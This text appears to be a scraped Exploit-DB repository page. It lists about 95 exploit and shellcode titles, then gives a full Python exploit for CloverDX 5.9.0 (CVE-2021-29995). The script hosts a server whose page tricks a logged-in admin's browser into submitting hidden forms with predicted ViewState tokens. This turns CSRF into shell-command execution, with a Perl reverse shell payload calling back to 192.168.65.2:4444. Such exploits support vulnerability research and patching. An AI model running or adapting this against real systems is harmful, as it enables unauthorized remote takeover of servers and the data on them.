de260aeac6
95 changes to exploits/shellcodes Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Sandboxie 5.49.7 - Denial of Service (PoC) WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) iDailyDiary 4.30 - Denial of Service (PoC) RarmaRadio 2.72.8 - Denial of Service (PoC) DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Color Notes 1.4 - Denial of Service (PoC) Macaron Notes great notebook 5.5 - Denial of Service (PoC) My Notes Safe 5.3 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) Telegram Desktop 2.9.2 - Denial of Service (PoC) Mini-XML 3.2 - Heap Overflow Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2) Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) MariaDB 10.2 - 'wsrep_provider' OS Command Execution Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free Visual Studio Code 1.47.1 - Denial of Service (PoC) DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) GNU Wget < 1.18 - Arbitrary File Upload (2) WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) E-Learning System 1.0 - Authentication Bypass PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated) Library System 1.0 - Authentication Bypass Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) Umbraco v8.14.1 - 'baseUrl' SSRF Cacti 1.2.12 - 'filter' SQL Injection GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated) Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting Xmind 2020 - Persistent Cross-Site Scripting Tagstoo 2.0.1 - Persistent Cross-Site Scripting SnipCommand 0.1.0 - Persistent Cross-Site Scripting Moeditor 0.2.0 - Persistent Cross-Site Scripting Marky 0.0.1 - Persistent Cross-Site Scripting StudyMD 0.3.2 - Persistent Cross-Site Scripting Freeter 1.2.1 - Persistent Cross-Site Scripting Markright 1.0 - Persistent Cross-Site Scripting Markdownify 1.2.0 - Persistent Cross-Site Scripting Anote 1.0 - Persistent Cross-Site Scripting Subrion CMS 4.2.1 - Arbitrary File Upload Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated) Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) CHIYU IoT Devices - Denial of Service (DoS) Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated) TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Scratch Desktop 3.17 - Remote Code Execution Church Management System 1.0 - Arbitrary File Upload (Authenticated) Phone Shop Sales Managements System 1.0 - Arbitrary File Upload Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS) WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) KevinLAB BEMS 1.0 - Authentication Bypass Event Registration System with QR Code 1.0 - Authentication Bypass CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password) qdPM 9.2 - Password Exposure (Unauthenticated) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit) GeoVision Geowebserver 5.3.3 - Local FIle Inclusion Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated) Umbraco CMS 8.9.1 - Directory Traversal Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dolibarr ERP 14.0.1 - Privilege Escalation Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS) Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation Phpwcms 1.9.30 - Arbitrary File Upload Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
137 lines
No EOL
12 KiB
Python
Executable file
137 lines
No EOL
12 KiB
Python
Executable file
# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)
|
|
# Date: 14.04.2021
|
|
# Exploit Author: niebardzo
|
|
# Vendor Homepage: https://www.cloverdx.com/
|
|
# Software Link: https://github.com/cloverdx/cloverdx-server-docker
|
|
# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x
|
|
# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker
|
|
# CVE : CVE-2021-29995
|
|
|
|
# Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX
|
|
# Victim authenticated to CloverDX and the java to run the ViewStateCracker.java.
|
|
# Reference for cracking ViewState:
|
|
# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html
|
|
# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
|
|
#
|
|
|
|
|
|
import http.server
|
|
import socketserver
|
|
import requests
|
|
from urllib.parse import urlparse
|
|
from urllib.parse import parse_qs
|
|
from bs4 import BeautifulSoup
|
|
import subprocess
|
|
import sys
|
|
import json
|
|
|
|
|
|
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
|
|
def do_GET(self):
|
|
self.send_response(200)
|
|
self.send_header("Content-Type", "text/html; charset=utf-8")
|
|
self.end_headers()
|
|
|
|
# replace with your own target
|
|
target = "http://localhost:8080"
|
|
|
|
query_comp = parse_qs(urlparse(self.path).query)
|
|
if "target" in query_comp:
|
|
target = query_comp["target"][0]
|
|
|
|
req = requests.get(target+"/clover/gui/login.jsf")
|
|
|
|
if req.status_code != 200:
|
|
sys.exit(-1)
|
|
|
|
# parse the reponse retrieve the ViewState
|
|
soup = BeautifulSoup(req.text, "html.parser")
|
|
cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"]
|
|
|
|
# Use the ViewstateCracker.java to get new Viewstate.
|
|
new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state])
|
|
new_view_state = new_view_state.decode("utf-8").strip()
|
|
print(new_view_state)
|
|
if new_view_state == "6927638971750518694:6717304323717288036":
|
|
html = ("<!DOCTYPE html><html><head></head><body><h1>Hello Clover Admin!</h1><br>"
|
|
+ "<script>window.setTimeout(function () { location.reload()}, 1500)</script></body></html>")
|
|
else:
|
|
html = ("<!DOCTYPE html><html><head>"
|
|
+ "<script>"
|
|
+ "function exec1(){document.getElementById('form1').submit(); setTimeout(exec2, 2000);}"
|
|
+ "function exec2(){document.getElementById('form2').submit(); setTimeout(exec3, 2000);}"
|
|
+ "function exec3(){document.getElementById('form3').submit(); setTimeout(exec4, 2000);}"
|
|
+ "function exec4(){document.getElementById('form4').submit();}"
|
|
+ "</script>"
|
|
+ "</head><body onload='exec1();'><h1>Hello Clover Admin! Please wait here, content is loading...</h1>"
|
|
+ "<script>history.pushState('','/');</script>"
|
|
+ "<form target='if1' id='form1' method='GET' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
|
|
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
|
|
+ "<form target='if2' id='form2' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
|
|
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
|
|
+ "<input type='hidden' value='headerForm:manualListenerItem' name='javax.faces.source'>"
|
|
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
|
|
+ "<input type='hidden' value='allContent' name='javax.faces.partial.render'>"
|
|
+ "<input type='hidden' value='headerForm:manualListenerItem' name='headerForm:manualListenerItem'>"
|
|
+ "<input type='hidden' value='headerForm' name='headerForm'>"
|
|
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
|
|
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
|
|
+ "<form target='if3' id='form3' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
|
|
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
|
|
+ "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.source'>"
|
|
+ "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.partial.execute'>"
|
|
+ "<input type='hidden' value='manualListeneForm:taskFormFragment' name='javax.faces.partial.render'>"
|
|
+ "<input type='hidden' value='valueChange' name='javax.faces.behavior.event'>"
|
|
+ "<input type='hidden' value='change' name='javax.faces.partial.event'>"
|
|
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
|
|
+ "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>"
|
|
+ "<input type='hidden' value='on' name='manualListeneForm:saveRunRecord_input'>"
|
|
+ "<input type='hidden' value='true' name='manualListeneForm:manualVariablesList_collapsed'>"
|
|
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
|
|
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
|
|
+ "<form target='if4' id='form4' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
|
|
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
|
|
+ "<input type='hidden' value='manualListeneForm:execute_button' name='javax.faces.source'>"
|
|
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
|
|
+ "<input type='hidden' value='rightContent' name='javax.faces.partial.render'>"
|
|
+ "<input type='hidden' value='manualListeneForm:execute_button' name='manualListeneForm:execute_button'>"
|
|
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
|
|
+ "<input type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propName'>"
|
|
+ "<input type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propValue'>"
|
|
+ "<input type='hidden' value='' name='manualListeneForm:taskType_focus'>"
|
|
+ "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>"
|
|
#
|
|
# Below is the HTML encoded perl reverse, replace with your own payload, remember to HTML encode.
|
|
#
|
|
+ "<input type='hidden' value='perl -e 'use Socket;$i="192.168.65.2";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'' name='manualListeneForm:shellEditor'>"
|
|
+ "<input type='hidden' value='' name='manualListeneForm:workingDirectory'>"
|
|
+ "<input type='hidden' value='10000' name='manualListeneForm:timeout'>"
|
|
+ "<input type='hidden' value='true' name='manualListeneForm:scriptVariablesList_collapsed'>"
|
|
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
|
|
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
|
|
+ "<iframe name='if1' style='display: hidden;' width='0' height='0' frameborder='0' ></iframe>"
|
|
+ "<iframe name='if2' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
|
|
+ "<iframe name='if3' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
|
|
+ "<iframe name='if4' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
|
|
+ "</body></html>")
|
|
|
|
self.wfile.write(bytes(html,"utf-8"))
|
|
|
|
|
|
base64_enc_viewstatecracker = "CnB1YmxpYyBjbGFzcyBWaWV3c3RhdGVDcmFja2VyIHsKICAvKiBTVEFSVCBQQVJUIDEgKi8KICBwdWJsaWMgc3RhdGljIGZpbmFsIGludCBvZmZzZXQgICAgID0gMzI7CiAgcHVibGljIHN0YXRpYyBmaW5hbCBpbnQgaXRlcmF0aW9ucyA9IDY1NTM2OwoKICBwdWJsaWMgc3RhdGljIGZpbmFsIFN0cmluZyBnZW5lcmF0ZU5ld1ZpZXdzdGF0ZShmaW5hbCBsb25nIGlkSW5Mb2dpY2FsTWFwLCBmaW5hbCBsb25nIGlkSW5BY3R1YWxNYXApIHsKICAgIGZpbmFsIGxvbmcgZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwICA9IGlkSW5Mb2dpY2FsTWFwID4+PiBvZmZzZXQ7CiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXAgPSAoKGlkSW5Mb2dpY2FsTWFwIDw8IG9mZnNldCkgPj4+IG9mZnNldCk7CiAgICBmaW5hbCBsb25nIGZpcnN0MzJCaXRzT2ZJZEluQWN0dWFsTWFwICAgPSBpZEluQWN0dWFsTWFwID4+PiBvZmZzZXQ7ICAgICAgICAgLy8gVmVyaWZpY2F0aW9uCiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkFjdHVhbE1hcCAgPSAoKGlkSW5BY3R1YWxNYXAgPDwgb2Zmc2V0KSA+Pj4gb2Zmc2V0KTsgLy8gVmVyaWZpY2F0aW9uCiAgICAvKiBFTkQgUEFSVCAxICovCgogICAgLyogU1RBUlQgUEFSVCAyICovCiAgICBsb25nIHRoZV9zZWVkID0gMUw7CgogICAgZm9yIChpbnQgaSA9IDA7IGkgPCBpdGVyYXRpb25zOyBpKyspIHsKICAgICAgbG9uZyB0bXBfc2VlZCA9ICgoZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwIDw8IDE2KSArIGkpOwogICAgICBpZiAoKChpbnQpKCgodG1wX3NlZWQgKiAweDVERUVDRTY2REwgKyAweEJsKSAmICgoMUwgPDwgNDgpIC0gMSkpID4+PiAxNikpID09IHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXApIHsKICAgICAgICAvL1N5c3RlbS5vdXQucHJpbnRsbigiU2VlZCBmb3VuZDogIiArIHRtcF9zZWVkKTsKICAgICAgICB0aGVfc2VlZCA9IHRtcF9zZWVkOwogICAgICAgIGJyZWFrOwogICAgICB9CiAgICB9CiAgICAvKiBFTkQgUEFSVCAyICovCgogICAgLyogU1RBUlQgUEFSVCAzICovCiAgICAvLyBHZW5lcmF0ZSBudW1iZXIgMiAoU2Vjb25kIE51bWJlciBvZiBpZEluTG9naWNhbE1hcCkKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwoKICAgIC8vQ2FsY3VsYXRlIHRoZSB2YWx1ZSBvZiBpZEluQWN0dWFsTWFwCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgLyogRU5EIFBBUlQgMyovCgogICAgLyogU1RBUlQgUEFSVCA0Ki8KICAgIC8qIENhbGN1bGF0ZSBhIG5ldyBpZEluTG9naWNhbE1hcCAqLwoKICAgIC8vIEdlbmVyYXRlIHRoZSBmaXJzdCBoYWxmIG9mIHRoZSBmaXJzdCBMb25nCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIGludCBudW1iZXJfNSA9ICgoaW50KSh0aGVfc2VlZCA+Pj4gMTYpKTsKCiAgICAvLyBHZW5lcmF0ZSB0aGUgc2Vjb25kIGhhbGYgb2YgdGhlIGZpcnN0IExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl82ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vSGVyZSBpcyB0aGUgbmV3IGlkSW5Mb2dpY2FsTWFwCiAgICBsb25nIG5ld19sb25nXzEgPSAoKChsb25nKW51bWJlcl81IDw8IDMyKSArIG51bWJlcl82KTsKCgogICAgLyogQ2FsY3VsYXRlIGEgbmV3IGlkSW5BY3R1YWxNYXAgKi8KCiAgICAvLyBHZW5lcmF0ZSB0aGUgZmlyc3QgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl83ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vIEdlbmVyYXRlIHRoZSBzZWNvbmQgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl84ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vCiAgICBsb25nIG5ld19sb25nXzIgPSAoKChsb25nKW51bWJlcl83IDw8IDMyKSArIG51bWJlcl84KTsKCiAgICByZXR1cm4gbmV3X2xvbmdfMSArICI6IiArIG5ld19sb25nXzI7CiAgICAvKkVORCBQQVJUNCovCiAgfQogcHVibGljIHN0YXRpYyB2b2lkIG1haW4gKFN0cmluZyBhcmdzW10pIHsKCVN0cmluZyB0b2tlbiA9IGFyZ3NbMF07CglTdHJpbmdbXSBsb25ncyA9IHRva2VuLnNwbGl0KCI6Iik7Cglsb25nIGxvbmcxID0gTG9uZy5wYXJzZUxvbmcobG9uZ3NbMF0pOwoJbG9uZyBsb25nMiA9IExvbmcucGFyc2VMb25nKGxvbmdzWzFdKTsKCVN0cmluZyBuZXdUb2tlbiA9IGdlbmVyYXRlTmV3Vmlld3N0YXRlKGxvbmcxLGxvbmcyKTsKCVN5c3RlbS5vdXQucHJpbnRsbihuZXdUb2tlbik7Cgp9Cgp9Cg=="
|
|
|
|
#
|
|
# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
|
|
#
|
|
|
|
with open("ViewstateCracker.java","w") as f:
|
|
f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8'))
|
|
|
|
|
|
exploit_handler = ExploitHandler
|
|
|
|
PORT = 6010
|
|
|
|
exploit_server = socketserver.TCPServer(("", PORT), exploit_handler)
|
|
|
|
exploit_server.serve_forever() |